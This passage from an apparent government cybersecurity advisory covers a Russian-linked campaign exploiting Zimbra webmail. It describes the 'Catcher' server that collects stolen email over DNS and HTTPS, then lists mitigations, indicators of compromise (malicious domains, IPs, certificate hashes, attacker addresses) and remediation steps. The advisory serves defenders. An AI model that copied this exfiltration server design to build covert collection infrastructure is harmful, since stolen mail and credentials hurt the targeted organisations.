<p>At the beginning and end of the collection and exfiltration activity, during the <em>sendStartPing</em> and <em>sendFinishPing </em>stages respectively, the script submits a POST request with a JSON payload to indicate that the script is starting or finishing execution. Throughout execution, the script also logs error events and send the logs using similar JSON payloads. The script sends the JSON in a POST request to the URL documented in <a href="https://www.cisa.gov/#figure2"><strong>Figure 2</strong></a>, using a URL path of “/v/p” and with a “subtype” key that shows which type of action it logged (<em>start, finish, or error</em>).  </p>
<h4><strong>Catcher</strong></h4>
<p><em>Ulej </em>exfiltrates information to Flowerbed to be handled by a service named Catcher. Catcher is a containerized Python application, running in Docker as part of Flowerbed, which is detailed in the <a href="https://www.cisa.gov/#resourcedev1">Resource development</a> section. It receives exfiltrated data and temporarily stores it, enabling its eventual transfer to infrastructure designed for long-term, secure storage.</p>
<p>Catcher acts as an HTTP server over port 8000 and a DNS server on port 53. As described in the <a href="https://www.cisa.gov/#resourcedev1">Resource development</a> section, the Flowerbed project uses an additional Docker container running an Nginx reverse proxy to enable HTTPS support. This reverse proxy uses a certificate generated by Let’s Encrypt and forwards all traffic with an SNI containing “*.i.*” to port 8000 within the Catcher container.</p>
<p>The DNS service can accept A, AAAA, MX, TXT, and CAA queries. For any MX, AAAA, or CAA queries, the server will always provide an empty response. The system only supports TXT records as needed to process Automatic Certificate Management Environment (ACME) requests, which enable the assignment of Let’s Encrypt certificates. If the server receives an A query, Catcher will always respond with the public IP address of the Flowerbed server.  </p>
<p>However, if a query includes a domain formatted as shown in <a href="https://www.cisa.gov/#figure6"><strong>Figure 6</strong></a> and <a href="https://www.cisa.gov/#figure7"><strong>Figure 7</strong></a>, the service saves a log file in JSON format to disk containing the following details of the DNS query:</p>
<ul>
<li>Time of query,</li>
<li>Source IP address for query,</li>
<li>Queried domain, and</li>
<li>Type of query.</li>
</ul>
<p>The HTTP server typically responds with OK, except in cases where the path is “pixel.gif” when the response contains a 1x1 gif image with a SHA-256 hash of ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629. Like the DNS service, the HTTP service will only log entries when the domain found in the host header of the request follows the expected formatting as seen in <a href="https://www.cisa.gov/#figure6"><strong>Figure 6</strong></a> and <a href="https://www.cisa.gov/#figure7"><strong>Figure 7</strong></a>. As the HTTPS exfiltration uses non-standardized binary and JSON-formatted payloads when exfiltrating to Catcher, Catcher will check the content type of the request. If the content type is set to “application/json”, Catcher encodes the data in Base64 and includes it in the JSON log entry written to disk. If the content type is set to any other value, Catcher leaves the Base64 payload in the JSON log entry blank and saves the payload to a separate file with the same filename as the JSON log entry with a “.bin” file extension. An HTTPS exfiltration event causes Catcher to save a JSON formatted log file to disk containing the following information from the HTTP request:</p>
<ul>
<li>Time,</li>
<li>Source IP address,</li>
<li>Request method,</li>
<li>Host,</li>
<li>Path,</li>
<li>Query string,</li>
<li>Headers, and</li>
<li>Base64 payload.</li>
</ul>
<p>These JSON event log files and binary output files are then initially saved to the directory <em>/root/hits/tmp</em> and later moved to the <em>/root/hits/ready</em> directory once processed. This prevents incomplete files, which are still being uploaded to Catcher, from premature exfiltration from the server. Approximately every 60 seconds, a likely automated workflow establishes a Secure Shell (SSH) connection with the server hosting Flowerbed for a few seconds, almost certainly exfiltrating the data processed by Catcher to non-public-facing infrastructure. The command in <a href="https://www.cisa.gov/#figure8"><strong>Figure 8</strong></a> also executes hourly to remove all files last modified at least two days ago from the <em>/root/hits/ready</em> directory.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/Figure%208-Command%20used%20for%20automated%20directory%20cleanup.png?itok=IqvZvbLK" width="1024" height="92" alt="Figure 8: Command used for automated directory cleanup">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 8: Command used for automated directory cleanup</strong></em></figcaption>
  </figure>
<h2><strong>Response strategies</strong></h2>
<h3><em><strong>Mitigations</strong></em><a class="ck-anchor"></a></h3>
<p>In many cases, by the time an organization identifies a compromise related to this campaign, numerous sensitive and proprietary emails have already been exfiltrated. The significant risk posed by this cyber threat emphasizes the importance for organizations that use ZCS and other similar webmail solutions to take proactive steps to mitigate this risk.</p>
<p>All organizations that use the ZCS webmail service should <strong>immediately prioritize</strong> ensuring that their ZCS is not running a vulnerable version. A patch for <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a> was released for both 10.1.13 and 10.0.18 versions of ZCS [<a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening">D3-AH</a>]. If immediate patching is not feasible, organizations should advise employees to use alternative mail clients to access email and avoid using the Classic ZCS webmail client until ZCS is updated to a non-vulnerable version [<a href="https://d3fend.mitre.org/tactic/d3f:Isolate/" target="_blank">d3f:Isolate</a>].</p>
<p>System administrators should closely monitor any Internet-connected ZCS or other email systems and the workstations that access those systems and promptly apply available software updates [<a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening" target="_blank">D3-AH</a>]. Administrators can maintain awareness of active vulnerability exploitation by referencing open source resources, including <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">CISA’s Known Exploited Vulnerabilities Catalog</a> and <a href="https://www.ncsc.gov.uk/collection/vulnerability-management/guidance/responding-to-active-exploitation" target="_blank">NCSC-UK’s Responding to active exploitation of vulnerabilities</a> guidance.</p>
<p>Organizations should consider using a third-party authentication service that supports passkeys for authentication to mediate access to ZCS and other services that do not natively support passkeys. By doing so, organizations can work to eliminate the possibility of automated password collection from autocomplete or password reuse [<a href="https://d3fend.mitre.org/technique/d3f:CredentialHardening" target="_blank">D3-CH</a>]. However, Application Passcodes may still be necessary and should be monitored closely.  </p>
<p>Organizations should implement network monitoring capabilities with collection and short-term retention of packet capture or NetFlow data and maintain log collection and storage [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#MaintainLogCollectionStorage3Q">CPG 3.Q</a>]. This will allow organizations to monitor for and identify suspicious network activity [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#IdentifyAdverseEvents4B">CPG 4.B</a>], such as:</p>
<ul>
<li>Significant amounts of outbound data being sent to IPs associated with VPS providers not used by the organization [<a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis" target="_blank">D3-NTA</a>];</li>
<li>Frequent DNS queries for a suspicious domain with seemingly random subdomains [<a href="https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis" target="_blank">D3-DNSTA</a>];</li>
<li>A sudden spike of connections to a server associated with a recently established domain [<a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation">D3-NTCD</a>]; and  </li>
<li>Connections to internal services, such as webmail, from VPN providers frequently leveraged by this group for nefarious activity, such as Mullvad VPN [<a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation">D3-NTCD</a>].</li>
</ul>
<p>Additionally, for organizations that can inspect the content of outbound HTTPS connections via break-and-inspect infrastructure, security teams should identify traffic matching the characteristics described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section of this advisory.</p>
<h3><em><strong>Indicators of compromise (IOCs)</strong></em><a class="ck-anchor"></a></h3>
<h4><strong>Flowerbed infrastructure</strong></h4>
<p>The following indicators have been attributed to use by LAUNDRY BEAR for their campaign targeting ZCS’s webmail service as of the publication of this advisory. (<strong>Disclaimer: </strong>Due to the frequency of operational structure changes by this group, these indicators are intended solely for historic attribution purposes. Some indicators, such as IPs, compromised emails, and domains, may be outdated, so organizations should check for current activity before acting on these IOCs.) <a href="https://www.cisa.gov/#table7"><strong>Table 7</strong></a> provides details about the server infrastructure used to host Flowerbed, and <a href="https://www.cisa.gov/#table8"><strong>Table 8</strong></a> lists the corresponding SHA-1 hash values for the Let’s Encrypt certificates used by that infrastructure [<a href="https://d3fend.mitre.org/technique/d3f:IdentifierActivityAnalysis" target="_blank">D3-IAA</a>].</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 7: Flowerbed server infrastructure</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p><strong>Domain </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p><strong>IP Address </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p><strong>First Seen </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p><strong>Last Seen </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>zmailanalytics[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>216.252.238[.]104 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>8 July 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>15 October 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>zimbra-metadata[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>216.252.238[.]18 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>20 August 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>14 October 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>analyticemailmeter[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>37.120.247[.]228 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>24 September 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>emailanalytics.com[.]ua </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>185.86.79[.]95 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>24 September 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>mailnalysis[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>104.248.134[.]194 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>11 November 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>17 February 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>zimbrastat[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>64.226.124[.]190 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 December 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>zimbrasoft.com[.]ua </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>193.238.152[.]66 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>20 January 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>synacorzimbra[.]nl </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>216.252.238[.]64 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>3 February 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>30 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>istc-cloud[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>194.156.103[.]193 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>5 February 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>30 March 2026 </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 8: Flowerbed X.509 certificate SHA-1 hashes  </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p><strong>Associated Domain </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p><strong>X.509 SHA-1 Hash </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p><strong>First Seen </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p><strong>Last Seen </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>zmailanalytics[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>2e4f314bc9943cab5005d6fde0b271c74d47bc9d </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>8 Jul 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>6 Aug 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.zmailanalytics[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>50a87d926621dd06389ba50d86e0ff574ed713a8 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>6 Aug 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>13 Oct 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.zimbra-metadata[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>c5a72420e7bb308d078e62128430897f82194c95 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>20 Aug 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>14 Oct 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.analyticemailmeter[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>8959c4d29e29f02ea94ea8bb21c8df2594c5549d </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>24 Sep 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>8 Nov 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.emailanalytics.com[.]ua </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>62eb76432597694edb01c1fe57aab0cfe03a7178 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>25 Sep 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>27 Sep 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.mailnalysis[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>cddf5c3be1e07f28140aed165b929bf2d614922a </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>12 Nov 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>17 Dec 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.zimbrastat[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>18b3ad442ce73cc8656d51d75bbd7c855f2cb7e8 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>18 Dec 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>28 Dec 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.zimbrasoft.com[.]ua </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>1b25041ececf2457eef0270fc1d785cec8ec9ded </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>21 Jan 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>10 Feb 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.synacorzimbra[.]nl </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>e4fe6466a4f9a4249fe330651e914e45bbdca44a </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>5 Feb 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>22 Mar 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.istc-cloud[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>b6b77c9a455225d525834a403ca9ef5481ed0447 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>12 Feb 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>30 Mar 2026 </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>LAUNDRY BEAR has used the following email addresses to procure resources used for this campaign:</p>
<ul>
<li>ivanka.zurabishvili@proton[.]me,</li>
<li>zmul1@buildandconsulting[.]com,</li>
<li>garrysmithme@pinmx[.]net, and</li>
<li>hostingclient@pinmx[.]net.</li>
</ul>
<h4><strong>Phishing distribution</strong></h4>
<p>LAUNDRY BEAR primarily relied on ProtonMail for distribution of malicious email. However, as stated above, LAUNDRY BEAR’s more recent efforts likely have shifted to distributing the payload through previous victims.  </p>
<p>The following email addresses have distributed payloads attributed to this campaign:</p>
<ul>
<li>c.laurent.ejfa@proton[.]me,</li>
<li>j.moreau.epsc@proton[.]me,</li>
<li>liberty.insights@proton[.]me,</li>
<li>certain email addresses (presumably compromised) at the isofts.kiev[.]ua domain (i.e., ending with @isofts.kiev[.]ua), and</li>
<li>certain email addresses (presumably compromised) at the navs.edu[.]ua domain (i.e., ending with @navs.edu[.]ua).</li>
</ul>
<p>Additionally, the following are SHA-256 hashes of email samples containing the malicious payload attributed to this campaign:</p>
<ul>
<li>98df604ecc57f884a2e6ce3266a0013ad64455cac48442c2312cfa4765007aaf,</li>
<li>60db9abae75cd8ccc49dd7ea5feb41677566dcd442f12ebc5745ffd2810fb874,</li>
<li>b1f5beb1175fc5c7d1806a2f0d900eb124c54f0286c5c52b66eea7a6633adb1d, and</li>
<li>1517b3caa495f6c4e832df9c75fc94667e3c233773f7fa4e056d5e30e5ead760.</li>
</ul>
<h4><strong>Post-compromise artifacts</strong></h4>
<p>Currently, the script does not remove artifacts. This leaves additional opportunities to identify victims of this activity. While emphasis should always be placed on consistent monitoring of network traffic and endpoint activity, there are a variety of persistent artifacts described below that can be used to identify victims of this campaign.</p>
<p>This <em>Ulej </em>capability relies on creating a significant number of SOAP requests to collect account information for exfiltration. ZCS logs from these requests are stored, by default, in the <em>/opt/zimbra/log/mailbox.log</em> file [<a href="https://d3fend.mitre.org/technique/d3f:ProcessAnalysis" target="_blank">D3-PA</a>]. A significant amount of SOAP request activity that aligns with what was described in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> and <a href="https://www.cisa.gov/#collection1">Collection</a> sections of this advisory could indicate a potential compromise. Specific examples of high-risk SOAP request activity might include:</p>
<ul>
<li>Many <em>SearchGalRequest </em>command requests from a single user over a short period of time;</li>
<li>Use of the <em>CreateAppSpecificPasswordRequest</em> command, especially in cases where it is creating an Application Passcode named “ZimbraWeb”; and</li>
<li>Use of the GetScratchCodesRequest command.</li>
</ul>
<p>While LAUNDRY BEAR uses the localStorage property to track what days had emails previously exfiltrated, defenders can use this property to identify victims of this campaign and determine the scope of exfiltrated information [<a href="https://d3fend.mitre.org/technique/d3f:ProcessAnalysis" target="_blank">D3-PA</a>]. Review of the items stored in that property for an organization’s ZCS webmail client page on an endpoint device could indicate compromise if there are items named with a format of <em>zd_comp_YYYY-MM-DD,</em> as explained in the <a href="https://www.cisa.gov/#collection1">Collection</a> section of this advisory.</p>
<p>While Application Passcodes have non-malicious purposes, in this case instances of these passcodes with the name “ZimbraWeb” are almost certainly malicious. The ZCS webmail application can support 2FA natively and does not require the use of an Application Passcode, so there is no reason that there should be one named “ZimbraWeb.”</p>
<p>In instances where organizations identify victims of this campaign, they should also examine the inbox of the suspected victim for the original phishing email [<a href="https://d3fend.mitre.org/technique/d3f:MessageAnalysis" target="_blank">D3-MA</a>]. If an email that has a payload exploiting <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376">CVE-2025-66376</a> is discovered, <strong>steps should be taken immediately to identify and quarantine other instances of emails with similar body content, senders, and subject lines to prevent further exploitation and exfiltration.  </strong></p>
<h3><em><strong>Remediation</strong></em></h3>
<p>In the event an organization identifies activity associated with this campaign, that organization should take steps to minimize further exploitation. The organization should consider requesting that employees minimize use of the ZCS webmail client until the organization updates to a patched version that is not vulnerable to <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a>.</p>
<p>Organizations should use identifiers from the <a href="https://www.cisa.gov/#ioc1">IOCs</a> section of this report to identify any individuals compromised by this campaign and record the date(s) of compromise(s) to determine the scale and scope of emails exfiltrated.</p>
<p>All users from the organization should have all Application Passcodes and 2FA scratch keys revoked. Affected organizations should require all employees to change passwords in line with establishing minimum password strength requirements [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#EstablishMinimumPasswordStrength3B">CPG 3.B</a>] and creating unique credentials [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#CreateUniqueCredentials3C">CPG 3.C</a>], specifically noting that compromised employees might have had any password stored in a password manager exfiltrated.</p>
<h2><strong>Works cited</strong></h2>
<p>[1<a class="ck-anchor"></a>] Netherlands General Intelligence and Security Service (AIVD) and Netherlands Defence Intelligence and Security Service (MIVD). AIVD and MIVD identify a new Russian cyber threat actor. 2025. <a href="https://www.aivd.nl/site/binaries/site-content/collections/documents/2025/05/27/aivd-en-mivd-onderkennen-nieuwe-russische-cyberactor/Advisory+AIVD+en+MIVD+Public+report+on+new+cyber+actor.pdf" target="_blank">https://www.aivd.nl/site/binaries/site-content/collections/documents/2025/05/27/aivd-en-mivd-onderkennen-nieuwe-russische-cyberactor/Advisory+AIVD+en+MIVD+Public+report+on+new+cyber+actor.pdf</a></p>
<p>[2]<a class="ck-anchor"></a> Microsoft Corporation. New Russia-affiliated actor Void Blizzard targets critical sectors for espionage. 2025. <a href="https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/" target="_blank">https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/</a></p>
<p>[3]<a class="ck-anchor"></a> Palo Alto Networks Unit 42. Russian Global Webmail Espionage. 2026. <a href="https://unit42.paloaltonetworks.com/russian-webmail-espionage/">https://unit42.paloaltonetworks.com/russian-webmail-espionage/ </a></p>
<p>[4]<a class="ck-anchor"></a> Proofpoint. TA488 Targets Zimbra Mailservers with Half-Click Exploits. 2026. <a href="https://www.proofpoint.com/us/blog/threat-insight/ta488-zcs-exploit">https://www.proofpoint.com/us/blog/threat-insight/ta488-zcs-exploit</a></p>
